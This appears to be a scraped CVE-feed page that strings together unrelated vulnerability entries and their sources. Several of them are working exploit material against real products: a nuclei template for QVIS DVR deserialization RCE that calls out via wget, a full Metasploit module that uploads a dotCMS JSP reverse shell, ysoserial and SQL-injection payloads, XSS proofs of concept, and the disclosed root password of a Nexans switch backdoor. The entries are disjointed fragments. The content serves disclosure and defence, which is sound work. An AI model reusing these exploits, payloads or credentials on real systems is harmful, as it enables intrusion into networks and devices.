A vulnerability in Apache SkyWalking NodeJS Agent prior to 0.5.1. The vulnerability will cause NodeJS services that has this agent installed to be unavailable if the OAP is unhealthy and NodeJS agent can't establish the connection.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-36127

QVIS NVR DVR before 2021-12-13 is vulnerable to Remote Code Execution via Java deserialization.

id: qvisdvr-deserialization-rce

info:

name: QVISDVR JSF Deserialization - Remote Code Execution

author: me9187

severity: critical

description: |

QVISDVR Java-Deserialization was discovered, which could allow remote code execution.

reference:

\- https://twitter.com/Me9187/status/1414606876575162373

classification:

cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

cvss-score: 10.0

cwe-id: CWE-77

tags: qvisdvr,rce,deserialization,jsf,iot

requests:

\- raw:

\- |

GET /qvisdvr/ HTTP/1.1

Host: {{Hostname}}

Content-Type: application/x-www-form-urlencoded

\- |

POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1

Host: {{Hostname}}

Content-Type: application/x-www-form-urlencoded

javax.faces.ViewState={{generate\_java\_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}

extractors:

\- type: regex

name: token

group: 1

internal: true

part: header

regex:

\- "JSESSIONID=(.\*)"

matchers-condition: and

matchers:

\- type: word

part: interactsh\_protocol

words:

\- http

\- type: status

status:

\- 500

# Enhanced by mp on 2022/05/19

CVE-2021-41419: nuclei-templates/qvisdvr-deserialization-rce.yaml at master · projectdiscovery/nuclei-templates

libnx_apl.so on Nexans FTTO GigaSwitch before 6.02N and 7.x before 7.02 implements a Backdoor Account for SSH logins on port 50200 or 50201.

All industrial managed FTTO GigaSwitch series from Nexans S.A. are affected by multiple vulnerabilities resulting from outdated software components embedded in the firmware. Hardcoded password hashes were also found in the firmware. Four known vulnerabilities (CVE-2017-16544, CVE-2015-0235, CVE-2015-7547 and CVE-2015-9261) were verified by emulating the device with the MEDUSA scalable firmware runtime.

**Vendor description**

"_As a global player in the cable industry, Nexans is behind the scenes delivering the innovative services and resilient products that carry thousands  
of watts of energy and terabytes of data per second around the world. Millions of homes, cities, businesses are powered every day by Nexans’ high-quality  
sustainable cabling solutions. We help our customers meet the challenges they face in the fields of energy infrastructure, energy resources, transport,  
buildings, telecom and data, providing them with solutions and services for the most complex cable applications in the most demanding environments._"

Source: https://www.nexans.com/company/What-we-do.html

**Business recommendation**

The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review of these  products conducted by security professionals to identify and resolve all security issues.

**Vulnerability overview/description****1) Outdated Vulnerable Software Components**

A static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that are used in the devices' firmware. Four of them were verified by using the MEDUSA scalable firmware runtime.

**2) Hardcoded Backdoor User (CVE-2022-32985)**

A hardcoded root user was found in "/etc/passwd". In combination with the invoked dropbear SSH daemon in the libnx\_apl.so library, it can be used on port 50201 and 50200 to login on a system shell.

**Proof of concept****1) Outdated Vulnerable Software Components**

Based on an automated scan with the IoT Inspector (ONEKEY) the following third party software packages were found to be outdated:

    Firmware version 6.02L:
    BusyBox       1.20.2 
    Dropbear SSH  2012.55
    GNU glibc     2.17
    lighttpd      1.4.48
    OpenSSL       1.0.2h

The following CVEs were verified with MEDUSA scalable firmware emulation:

****CVE-2015-9261 (Unzip)****

The crafted ZIP archive "x\_6170921383890712452.bin" was taken from: https://www.openwall.com/lists/oss-security/2015/10/25/3

Execution inside the firmware emulation:

    bash-4.2# unzip x_6170921383890712452.bin 
    Archive:  x_6170921383890712452.bin
      inflating: ]3j½r«IK-%Ix
    do_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc
    epc = 0044bb28 in busybox[400000+99000]
    ra  = 0044b968 in busybox[400000+99000]
    Segmentation fault

****CVE-2015-0235 (gethostbyname "GHOST" buffer overflow)****

PoC code was taken from: https://gist.github.com/dweinstein/66e6a088191ac0e8105c

****CVE-2015-7547 (getaddrinfo buffer overflow)****

PoC code was taken from: https://github.com/fjserna/CVE-2015-7547

    -bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &
    [1] 259
    -bash-4.4# chroot /medusa_rootfs/ bin/bash
    bash-4.2# cd /medusa_exploits/
    bash-4.2# ./cve-2015-7547_glibc_getaddrinfo
    [UDP] Total Data len recv 36
    [UDP] Total Data len recv 36
    Connected with 127.0.0.1:34356
    [TCP] Total Data len recv 76
    [TCP] Request1 len recv 36
    [TCP] Request2 len recv 36
    Segmentation fault

****CVE-2017-16544 (shell autocompletion vulnerability)****

A file with the name "\\ectest\\n\\e\]55;test.txt\\a" was created to trigger the vulnerability.

    # ls "pressing <TAB>"
    test
    ]55;test.txt
    #

**2) Hardcoded Backdoor User (CVE-2022-32985)**

The hardcoded system user, reachable via the dropbear SSH daemon was found due to multiple indications on the system. The undocumented root user itself was contained in the "passwd" file:  

Content of the file "/etc/passwd".

    root:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh
    [...]

Update: The password for the root user is: !Nexans\_

A suspicious port for the SSH daemon was chosen in the config file of dropbear: 

Content of the file "/etc/init.d/dropbear":

    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    DAEMON=/usr/sbin/dropbear
    NAME=dropbear
    DESC="Dropbear SSH server"
    PIDFILE=/var/run/dropbear.pid
    
    DROPBEAR_PORT="50200 -p 50201"
    [...]

This is invoked from "/usr/lib/libnx\_apl.so.0.0.0", which can be seen in the  following pseudo-code:

    void dropbear_server_init(char param_1)
    
    {
      __pid_t __pid;
      char *pcVar1;
      int aiStack16 [2];
      
      __pid = fork();
      if (__pid == 0) {
        __pid = fork();
        if (__pid != 0) {
                        /* WARNING: Subroutine does not return */
          exit(0);
        }
        if (param_1 == '\0') {
          pcVar1 = "/etc/init.d/dropbear stop";
        }
        else {
          pcVar1 = "/etc/init.d/dropbear start";                               <---
        }
        execl("/bin/sh","sh",&DAT_2cd91564,pcVar1,0);
      }
      else {
        waitpid(__pid,aiStack16,0);
      }
      return;
    }

This function is called if a specific command is issued in the CLI interface:

    [...]
      iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),"ssh",2);
      if (iVar6 != 0) {
        if (param_2 < 4) {
          netbuf_fwd_sprintf(param_1,"\r\n%%Error: Parameter missing\r\n");
          iVar6 = shared_mem_get_addr(&var_shm);
          iVar7 = shared_mem_get_addr(&var_shm);
          uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);
          shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);
          return;
        }
        iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"start",1);
        if (iVar6 != 0) {
          dropbear_server_init('\x01');                                        <---
          netbuf_fwd_sprintf(param_1,"Starting dropbear...\r\n");
          return;
        }
        iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"stop",1);
        if (iVar6 != 0) {
          dropbear_server_init('\0');                                          <---
          netbuf_fwd_sprintf(param_1,"Stopping dropbear...\r\n");
          return;
        }
        netbuf_fwd_sprintf(param_1,"Uknown dropbear command...\r\n");
        return;
    [...]

The mentioned library is used in the CLI program that is running on the device.

**Vulnerable / tested versions**

The following firmware versions have been tested:

*   Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L
*   Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M

**Vendor contact timeline**

CVE-2022-32985: Hardcoded Backdoor User and Outdated Software Components in Nexans FTTO GigaSwitch series

An issue was discovered in Gentics CMS before 5.43.1. There is stored XSS in the profile description and in the username.

Gentics CMS is a solution to design and manage a website. The CMS is vulnerable to two vulnerabilities that lead to stored Cross-Site-Scripting (XSS) as well as Remote Code Execution (RCE) via unsafe deserialization of Java objects.

**Vendor description**

_"APA-IT Informations Technologie GmbH offers offers support with a focus on media solutions and IT-outsourcing. As a subsidiary of APA – Austria Press Agency, we are responsible for the IT of the Austrian news agency as well as numerous other media enterprises._

_This expertise and insight into the industry make APA-IT an expert for IT solutions for publishers and media-related companies. Existing systems and tools are constantly developed and tailored to individual customer needs. As such, APA-IT is always available – from conception to operation."_ 

Source: https://www.gentics.com/genticscms/company\_gentics.en.html

**Business recommendation**

The vendor provides a patch which should be installed immediately. 

SEC Consult recommends to perform a thorough security review of these products conducted by security professionals to identify and resolve all security issues. 

**Vulnerability overview/description****1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982) **

Multiple cross-site scripting vulnerabilities are present in the application. An attacker can store malicious JavaScript code in the username and profile description. The code will execute once an admin user hovers over the attacker's username. Thus, the attacker can execute code in the context of an admin. 

**2) Unsafe Java Deserialization (CVE-2022-30981) **

The Gentics CMS has an import option which will accept ZIP files. The archive includes a Java serialized object that gets deserialized on import. This can lead to code execution on the server. 

A low privileged user might be able to exploit this vulnerability by chaining it together with vulnerability 1). 

**Proof of concept****1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982) **

To trigger the first XSS, an attacker has to change the profile description to include a payload, e.g. **"<script>alert(document.domain)</script)".** The payload will execute once a user with access to the userlist hovers his mouse over the profile name. The event "onmouseover" will trigger following code: 

    JSI3_comp_list_401__ass( this, 'Properties', '<b>Malicious User Name</b><br> 
    <script>alert(document.domain)</script><br><br>created:<br> 09/20/2002  
    ( Gentics Support)<br>last edited:<br>15:56 (Malicious Username)', '' ); 

The execution of the code leads to following function: 

    function JSI3_comp_list_401__ass( obj, title, text, assTitle ) 
    { 
    JSI3_comp_list_401__assReset(); 
    clearTimeout( JSI3_comp_list_401___ass_timeout ); 
    JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ); 
    } 

The malicious code, which is contained in the "text" parameter, gets passed through to the next function. There it is added to an HTML element and thus executed in the browser. 

    function JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ) { 
             if (!JSI3_comp_list_401__ass_show_row_tipsy[obj.id]) { 
                 JSI3_comp_list_401__ass_show_row_tipsy[obj.id] = true; 
                 $(obj).attr('title', '<h6>'+title+'</h6>'+text+((assTitle)?'<br>'+assTitle:'')); 
                 $(obj).tipsy({ 
                         trigger: 'manual', 
                         html: true, 
                         offset: 3, 
                         delayIn: 900, 
                         delayOut: 0, 
                         opacity: 0.85, 
                         gravity: 'nww' 
                  }); 
              } 
              $(obj).tipsy("show"); 
              gcn_active_tipsy = obj; 
    } 

Another XSS vector can be found in the parameters "First Name" and "Last Name". 

By e.g. changing the last name to 'Node" onload="alert(document.domain)',  JavaScript code is added to the profile picture that is loaded in the upper right corner on every page. The following snippet shows the vulnerable line of code: 

    <div id="profil"> 
    <div><img src="?do=11&module=system&img=profile_man.png" title="Admin Node" onload="alert(document.domain)" class="profile_avatar"></div> 

The third XSS is caused by changing the first and last name into JavaScript code without prior encoding. Changing the last name to "Last Name'+eval(alert(document.domain))+'" will cause the following code to be included in the server's response: 

    <script language="JavaScript" type="text/javascript"> 
    var menus = new Array(); 
    var imgs = new Array(); 
    menus['Admin Last Name'+eval(alert(document.domain))+''] = new Array(); 
    menus['Admin Last Name'+eval(alert(document.domain))+'']['layer_pos'] = 1; 
    menus['Admin Last Name'+eval(alert(document.domain))+'']['align'] = 'r';

**2) Unsafe Java Deserialization (CVE-2022-30981) **

First, a malicious ZIP archive needs to be created. The following files will need to be included within this archive: 

    bundlebuild.xml:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <bundlebuild>
            <bundleinfo>
                  <name><![CDATA[test4]]></name>
                  <sourcehost><![CDATA[b1d80757b76c]]></sourcehost>
                  <description><![CDATA[]]></description>
                  <globalid>9d6243ab-a281-11eb-9ae3-0242ac130004</globalid>
                  <globalprefix>D77D</globalprefix>
             </bundleinfo>
             <builds>
                     <build>
                           <builddate>1618996405</builddate>
                           <changelog><![CDATA[test4]]></changelog>
                           <count>0</count>
                     </build>
              </builds>
              <tables>
              </tables>
    </bundlebuild>
    
    containedobjects.xml:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <objects>
    </objects>

The third file has to be named "serializedjava.bin" and contains the actual payload. A demo payload can be generated with following command: 

    $ ysoserial FileUpload1 'write;/tmp;SECTEST' > serializedjava.bin 

Those three files have to be zipped together into an archive, which can be uploaded. 

The import feature is available under Enterprise CMS -> Administration -> Import and Export. Now select New->Import and upload the malicious ZIP archive. 

Wait until the import completed. Now click on "Test succeeded" in the file list. On the new screen select "Start import in background". The payload should create a file called "upload\_<random\_uuid>.tmp" in the folder /tmp. It will contain the string "SECTEST".  

Better deserialization chains could be built to reach more interesting targets. It is very likely, that RCE could be obtained by writing an own deserialization chain. 

**Vulnerable / tested versions**

The following product version has been tested and found to be vulnerable. Other versions are vulnerable as well, please see the vendor's changelog in the solution section. 

*   Gentics CMS 5.36.29

**Vendor contact timeline**

CVE-2022-30982: Multiple vulnerabilies in Gentics CMS

An issue was discovered in the ContentResource API in dotCMS 3.0 through 22.02. Attackers can craft a multipart form request to post a file whose filename is not initially sanitized. This allows directory traversal, in which the file is saved outside of the intended storage location. If anonymous content creation is enabled, this allows an unauthenticated attacker to upload an executable file, such as a .jsp file, that can lead to remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'DotCMS RCE via Arbitrary File Upload.',        'Description' => %q{          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.        },        'Author' => [          'Shubham Shah',  # Discovery and analysis          'Hussein Daher', # Discovery and analysis          'jheysel-r7'     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-26352'],          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']        ],        'Privileged' => false,        'Platform' => %w[linux win],        'Targets' => [          [            'Java Linux',            {              'Arch' => ARCH_JAVA,              'Platform' => 'linux'            }          ],          [            'Java Windows',            {              'Arch' => ARCH_JAVA,              'Platform' => 'win'            }          ]        ],        'DisclosureDate' => '2022-05-03',        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      Opt::RPORT(8443),      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    test_content = Rex::Text.rand_text_alpha(10)    test_file = "#{test_content}.jsp"    test_path = "../../#{test_file}"    uuid = Faker::Internet.uuid    jsp = <<~EOS      <%@ page import=\"java.io.File\" %>      <%        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");        jsp.delete();      %>      #{uuid}    EOS    vars_form_data = [      {        'name' => 'name',        'data' => jsp,        'encoding' => nil,        'filename' => test_path,        'mime_type' => 'text/plain'      }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, test_file.to_s)    )    if res && res.body.include?(uuid)      return Exploit::CheckCode::Vulnerable    end    Exploit::CheckCode::Safe  end  def write_jsp_payload    jsp_path = "../../#{jsp_filename}"    print_status('Writing JSP payload')    vars_form_data = [      {        'name' => 'name',        'data' => payload.encoded,        'encoding' => nil,        'filename' => jsp_path,        'mime_type' => 'text/plain'      }    ]    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    unless res&.code == 500      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')    end    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")    print_good('Successfully wrote JSP payload')  end  def execute_jsp_payload    jsp_uri = normalize_uri(target_uri.path, jsp_filename)    print_status('Executing JSP payload')    res = send_request_cgi(      'method' => 'GET',      'uri' => jsp_uri    )    unless res&.code == 200      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')    end    print_good('Successfully executed JSP payload')  end  def exploit    write_jsp_payload    execute_jsp_payload  end  def jsp_filename    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"  endend

CVE-2022-26352: dotCMS Shell Upload ≈ Packet Storm

All versions of package angular are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.

NPM package [angular](https://www.npmjs.com/package/angular) is deprecated. Those who want to receive security updates should use the actively maintained package [@angular/core](https://www.npmjs.com/package/@angular/core).

**Angular (deprecated package) Cross-site Scripting**

Moderate severity GitHub Reviewed Published Jul 16, 2022 • Updated Jul 20, 2022

GHSA-prc3-vjfx-vhm9: Angular (deprecated package) Cross-site Scripting

The package terser before 4.8.1, from 5.0.0 and before 5.14.2 are vulnerable to Regular Expression Denial of Service (ReDoS) due to insecure usage of regular expressions.



@@ -30,10 +30,10 @@ regexp\_2: { unsafe: true, } input: { console.log(JSON.stringify("COMPASS? Overpass.".match(new RegExp("(\[Sap\]+)", "ig")))); console.log(JSON.stringify("COMPASS? Overpass.".match(new RegExp("(pass)", "ig")))); } expect: { console.log(JSON.stringify("COMPASS? Overpass.".match(/(\[Sap\]+)/gi))); console.log(JSON.stringify("COMPASS? Overpass.".match(/(pass)/gi))); } expect\_stdout: '\["PASS","pass"\]' } @@ -44,10 +44,10 @@ unsafe\_slashes: { unsafe: true } input: { console.log(new RegExp("^https://")) console.log(new RegExp("^https//")) } expect: { console.log(/^https:\\/\\//) console.log(/^https\\/\\//) } } unsafe\_nul\_byte: { @@ -75,3 +75,16 @@ inline\_script: { } expect\_exact: '/\* <\\\\/script> \*/\\n/\[<\\\\/script>\]/;' }  
regexp\_no\_ddos: { options \= { unsafe: true, evaluate: true } input: { console.log(/(b+)b+/.test("bbb")) console.log(RegExp("(b+)b+").test("bbb")) } expect: { console.log(/(b+)b+/.test("bbb")) console.log(RegExp("(b+)b+").test("bbb")) } expect\_stdout: \["true", "true"\] }

CVE-2022-25858: fix potential regexp DDOS · terser/terser@a4da734

# Impact
Due to insufficient class name validation in GrapeJS library it's possible to add executable JS code in class name through Selector Manager

# Relates to
 - [https://github.com/artf/grapesjs/issues/4411](https://github.com/artf/grapesjs/issues/4411)

# Patch
Update GrapeJS dependency to >=[v0.19.5](https://github.com/artf/grapesjs/releases/tag/v0.19.5)


**OroCommerce vulnerable to XSS when adding class name to Selector Manager on pages that use GrapeJS editor**

Moderate severity GitHub Reviewed Published Jul 15, 2022 in oroinc/orocommerce • Updated Jul 15, 2022

GHSA-6f85-3f8q-qc94: OroCommerce vulnerable to XSS when adding class name to Selector Manager on pages that use GrapeJS editor

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/classes/Master.php?f=delete_product.

Permalink

Cannot retrieve contributors at this time

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

Vul\_Author: XuBoyu

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/classes/Master.php?f=delete\_product

Vulnerability location: /psrs/classes/Master.php?f=delete\_product, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /psrs/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/psrs/admin/?page=products
Content-Length: 65
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-32416: bug_report/SQLi-1.md at main · Estbonxby/bug_report

Fast Food Ordering System v1.0 was discovered to contain a persistent cross-site scripting (XSS) vulnerability via the component /ffos/classes/Master.php?f=save_category.

    ## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting## Author: Ashish Kumar## Date: 05.31.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software:https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html## Reference:https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6#Description：#The Line 255 of Master.php sends unvalidated data to a web browser, whichcan result in the browser executing malicious code.#echo $Master->save_category();#PoC：POST /ffos/classes/Master.php?f=save_category HTTP/1.1Host: localhostContent-Length: 480sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarySmYVeqOBMhcSziZMX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/ffos/admin/?page=categoriesAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcjConnection: close------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="id"10------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="name"XSS------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="description"Testing XSS "><img src="" onerror="alert(document.cookie)">------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="status"1------WebKitFormBoundarySmYVeqOBMhcSziZM--

Tag

#js